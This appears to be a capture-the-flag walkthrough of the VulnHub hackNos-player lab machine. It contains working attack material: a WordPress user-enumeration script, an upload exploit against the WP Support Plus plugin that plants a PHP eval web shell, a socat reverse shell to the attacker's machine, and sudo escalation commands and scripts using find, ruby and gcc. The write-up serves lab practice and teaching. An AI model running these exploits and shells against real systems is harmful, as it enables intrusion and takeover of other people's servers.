hackNos-player target machine penetration

Target download address: https://www.vulnhub.com/entry/hacknos-player,459/

Network Configuration

The VM may not pick up an IP address automatically. If it does not show up in a scan, assign one by hand, following the procedure in this post: https://blog.csdn.net/asstart/article/details/103433065?utm_source=app

At the GRUB menu, press e to edit the boot entry. On the linux line change ro to rw and append init=/bin/bash (some guides also add the word single; it is not needed, init=/bin/bash is what gives you the shell), then press Ctrl+X to boot straight into a root shell.

In that shell run dhclient to request an address over DHCP, then check with ip a (or ifconfig). Once an address shows up, reboot. If the VM comes back without an address, compare the interface name shown by ip a with the one named in the network configuration (/etc/network/interfaces or /etc/netplan/*.yaml); a mismatch there is the usual reason the boot-time DHCP request never happens.

Early stage: reconnaissance


Opening the site in a browser shows only the default Apache page.

A port scan found two open ports, 80 and 3306. I first tried brute-forcing port 3306 (MySQL).

The brute force quickly produced a flood of errors. MySQL caps the number of failed connection attempts from a single host (the max_connect_errors variable); once the cap is hit it refuses every further connection from that host with "Host ... is blocked because of many connection errors", and the block stays in place until an administrator runs FLUSH HOSTS (mysqladmin flush-hosts) or restarts the server. So hammering 3306 is pointless, and the only remaining way in is port 80.
Use dirsearch to scan for directories (quote the extension wildcard so the shell does not expand it):

dirsearch.py -u "http://192.168.245.171/" -e '*' -r -R 3

Nothing of value turned up. I tried guessing directories from combinations of hackNos, player and Rahul_Gehlaut, still without finding anything new; not my finest moment. Time to think differently: since the author left only port 80 usable, there had to be something on port 80 I had overlooked, and sure enough the site's real web root was hinted at on the default page itself.

I had searched everywhere for it, and it turned out to be right under my nose the whole time (as the old poem goes: after a thousand searches in the crowd, you turn around and there they are, in the dim lamplight).
Behind it was a WordPress install.

I went all in with wpscan straight away. My local wpscan install has always been troublesome, so I used the Docker image instead. Docker lives on my Tencent Cloud box, so I simply exposed the target to the internet and scanned it from there, too lazy to install anything locally.

docker run -it --rm wpscanteam/wpscan --url http://xx.xx.xx/g@web/

The scan flagged a plugin running a version with known vulnerabilities (WP Support Plus Responsive Ticket System).
Next, enumerate the users:

docker run -it --rm wpscanteam/wpscan --url http://xx.xx.xx/g@web/ --enumerate u

wpscan pointed at a suspicious endpoint, the WordPress REST API user listing:

http://192.168.245.171/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1

Opening that URL reveals a password-like string in one of the user records: hackNos@9012!! (the spaces some extractions insert around @ and !! are not part of it). Note it down for later.
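The enumeration step above is easy to script. The following is an added example, not code from the original post: it walks every page of the wp/v2/users endpoint using the X-WP-TotalPages header WordPress sends, and reduces each record to the login slug, display name and free-text description. The sample JSON is constructed to mimic the endpoint; that the password-like string sat in the description field is an assumption, the post only says it was visible in the user listing.

```python
"""Enumerate WordPress users through the REST API and pull out the fields
an attacker cares about.  Added example, not code from the original post."""
import json
import urllib.request

USERS_ENDPOINT = "/index.php/wp-json/wp/v2/users/"


def extract_users(payload):
    """Reduce the endpoint's JSON array to (slug, name, description) tuples.

    The slug is the login name WordPress exposes even when display names are
    customised; the description is free text the admin may have filled in,
    which is where this example assumes the password-like string showed up.
    """
    users = json.loads(payload) if isinstance(payload, (str, bytes)) else payload
    return [(u.get("slug", ""), u.get("name", ""), u.get("description", ""))
            for u in users]


def fetch_users(site_root, per_page=100, timeout=10):
    """Walk every page of the users endpoint.

    WordPress reports the page count in the X-WP-TotalPages response header,
    so we stop there instead of probing until the API returns a 400.
    """
    found, page = [], 1
    while True:
        url = f"{site_root.rstrip('/')}{USERS_ENDPOINT}?per_page={per_page}&page={page}"
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            batch = json.loads(resp.read().decode())
            total_pages = int(resp.headers.get("X-WP-TotalPages", "1"))
        found.extend(extract_users(batch))
        if page >= total_pages:
            return found
        page += 1


# Constructed sample response shaped like the real endpoint (not captured from the box).
SAMPLE = json.dumps([
    {"id": 1, "name": "admin", "slug": "admin", "description": ""},
    {"id": 2, "name": "Rahul Gehlaut", "slug": "rahul",
     "description": "type password hackNos@9012!!"},
])

if __name__ == "__main__":
    import sys
    # Assumed lab value; pass the real WordPress root on the command line.
    root = sys.argv[1] if len(sys.argv) > 1 else None
    users = fetch_users(root) if root else extract_users(SAMPLE)
    for slug, name, desc in users:
        print(f"{slug:12} {name:20} {desc}")
```

Anything returned here is a valid login name for the site, which is why hardening guides recommend blocking the users endpoint for unauthenticated requests.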

Mid-term: exploitation

Search wpvulndb directly for a public exploit against the plugin:

https://wpvulndb.com/search?text=WP Support Plus Responsive Ticket System

Pick the remote code execution entry (an arbitrary file upload).

The advisory shows that the upload handler filters by a blacklist of file extensions written as a switch/case: only the names it lists are rejected, so an extension it forgot, such as .phtml, goes straight through. On a stock Debian/Ubuntu Apache+PHP setup the PHP handler matches .php, .phtml and .phar alike, so the uploaded .phtml executes as PHP. Copy the exploit form from the advisory and point its action at the target's WordPress root (here http://192.168.245.171/g@web/); the file goes in the field named 0 together with the action parameter wpsp_upload_attachment.

<!-- action must be the target's WordPress root followed by /wp-admin/admin-ajax.php -->
<form method="post" enctype="multipart/form-data" action="http://192.168.245.171/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

We upload a PHP one-liner web shell, saved with a .phtml extension:

<?php eval(@$_POST[1]);?>

The upload succeeds.

Locate the shell in the plugin's upload directory, open it and send commands as the POST parameter 1.
From there we use socat to bounce back a fully interactive shell.
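To make the bug class and the exploit request concrete, here is an added example (not the plugin's code and not code from the original post). The BLACKLIST set is a constructed stand-in for the plugin's real switch/case list, shown next to the allowlist check it should have used; build_upload_request produces the same multipart POST as the HTML form above using only the standard library. The lab URL and the shell.phtml filename are assumptions.

```python
"""Blacklist-versus-allowlist extension filtering, and the multipart request
behind the wpsp_upload_attachment form.  Added example, not the plugin's or
the original post's code."""
import uuid
import urllib.request

# Constructed blacklist modelling the plugin's switch/case: anything it does
# not name explicitly falls through and is accepted.  Not the plugin's real list.
BLACKLIST = {"php", "php3", "php4", "php5", "phps", "exe", "sh"}
# What the check should have been: only the extensions the feature needs.
ALLOWLIST = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "zip"}


def extension(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def blacklist_allows(filename):
    """Vulnerable check: a name whose extension is not listed passes."""
    return extension(filename) not in BLACKLIST


def allowlist_allows(filename):
    """Hardened check: the extension must be one explicitly allowed."""
    return extension(filename) in ALLOWLIST


def build_multipart(fields, files):
    """Encode form fields and files as multipart/form-data with the stdlib only.

    files maps field name -> (filename, bytes).  Returns (body, content_type).
    """
    boundary = "----pwn" + uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
            f"\r\n\r\n{value}\r\n".encode()
        )
    for name, (filename, data) in files.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; '
            f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'.encode()
            + data + b"\r\n"
        )
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def build_upload_request(site_root, filename, content):
    """Same request the HTML form sends: action=wpsp_upload_attachment, file field '0'."""
    body, ctype = build_multipart({"action": "wpsp_upload_attachment"},
                                  {"0": (filename, content)})
    url = site_root.rstrip("/") + "/wp-admin/admin-ajax.php"
    return urllib.request.Request(url, data=body,
                                  headers={"Content-Type": ctype}, method="POST")


def upload(site_root, filename, content, timeout=10):
    """Send the request and return the response body (the plugin echoes the stored name)."""
    req = build_upload_request(site_root, filename, content)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    import sys
    # Assumed lab value; pass the real WordPress root on the command line.
    root = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.245.171/g@web"
    print(upload(root, "shell.phtml", b"<?php eval(@$_POST[1]);?>"))
```

Run the two checks against shell.phtml and shell.php to see the difference: the blacklist rejects only the spellings it knows, the allowlist rejects everything that is not an image or document.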

socat is a Unix tool that can be thought of as an enhanced nc: it relays between two arbitrary byte streams, and it can hand a full TCP connection a pseudo-terminal, so the shell that comes back supports job control, tab completion and Ctrl+C. It has to be present on the target, so check with which socat before relying on it.

Controlling end (listener; raw,echo=0 puts the local terminal into raw mode so keystrokes go straight to the remote side):
socat file:`tty`,raw,echo=0 tcp-listen:8888

Then send this to the web shell as the POST body (parameter 1), with 192.168.245.170 being the attacking machine:

1=system("socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.170:8888");

The listener in the lower right of the screenshot receives the reverse shell.

Later stage: privilege escalation

sudo -l asks for a password for the web server user, and the password found earlier does not work there.

Listing /home shows three user accounts, so try the password hackNos@9012!! against each of them in turn.

It works for the security user.

sudo -l now shows that security may run find as hackNos-boat without a password. This is where GTFOBins comes in: it catalogues which binaries can be turned into a shell when run with elevated rights.
https://gtfobins.github.io/

find's -exec action runs a command for every file that survived the preceding filters, and the command is executed as whatever user find itself runs as. So we simply have it execute /bin/bash:
sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \;

That gives us hackNos-boat. Checking sudo -l again shows this user may run ruby as hunter. ruby -e runs the string that follows as a script, so we exec a shell from it:
sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'

As hunter, sudo -l shows that gcc may be run as root. Straight back to GTFOBins:

sudo -u root /usr/bin/gcc -wrapper /bin/bash,-s .

That yields a root shell. The -wrapper option is documented in gcc's overall options: it makes the gcc driver run every subprogram it spawns (cc1, as, collect2 and so on) under a wrapper program whose name and arguments are given as a comma-separated list. With /bin/bash,-s the driver therefore runs /bin/bash -s <subprogram and its arguments> as soon as it goes to process the dummy input ., and bash -s reads commands from standard input while the subprogram's arguments merely become its positional parameters. The result is an interactive shell as root.
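The whole chain is a matter of reading sudo -l output and recognising binaries with a known escalation primitive, which can be automated. The following is an added example, not code from the original post: it parses the rules section of sudo -l (including the (user : group) and NOPASSWD: forms) and maps the three binaries used on this box to the GTFOBins commands above. The sudo -l text is constructed to match what the walkthrough describes, not captured from the machine, and the PRIMITIVES table deliberately covers only find, ruby and gcc.

```python
"""Parse `sudo -l` output and flag entries that known primitives turn into a
shell.  Added example, not the original post's code."""
import re

# binary -> escalation command; {runas} and {path} come from the sudo rule.
PRIMITIVES = {
    "find": "sudo -u {runas} {path} . -exec /bin/bash \\;",
    "ruby": "sudo -u {runas} {path} -e 'exec \"/bin/bash\"'",
    "gcc":  "sudo -u {runas} {path} -wrapper /bin/bash,-s .",
}

# A rule line looks like "    (hackNos-boat) NOPASSWD: /usr/bin/find" or
# "    (root : root) /usr/bin/gcc"; tags such as NOPASSWD: or SETENV: are optional.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return [(runas_user, nopasswd, command), ...] from sudo -l output.

    Only lines after the "may run the following commands" banner are rules;
    the Defaults block above it is ignored, as is a "may not run sudo" refusal.
    """
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(user : group)" -> user
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((runas, nopasswd, cmd.strip()))
    return rules


def suggest(rules):
    """Map each rule whose binary has a primitive to the concrete escalation command."""
    out = []
    for runas, nopasswd, cmd in rules:
        path = cmd.split()[0]
        name = path.rsplit("/", 1)[-1]
        if name in PRIMITIVES:
            out.append((runas, nopasswd, PRIMITIVES[name].format(runas=runas, path=path)))
    return out


# Constructed sudo -l output for the 'security' user (not captured from the box).
SAMPLE = """\
Matching Defaults entries for security on player:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User security may run the following commands on player:
    (hackNos-boat) NOPASSWD: /usr/bin/find
"""

if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for runas, nopasswd, cmd in suggest(parse_sudo_l(text)):
        print(f"[{'NOPASSWD' if nopasswd else 'password'}] as {runas}: {cmd}")
```

Pipe real output in with sudo -l | python3 sudo_audit.py; a rule that still requires a password is reported too, since on this box the password was already known.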

Closing note: I had not done a boot-to-root in a while and found I had forgotten a lot, so I wrote this up to keep it from slipping away again. Onwards.


Source: www.cnblogs.com/AirSky/p/hacknos-player.html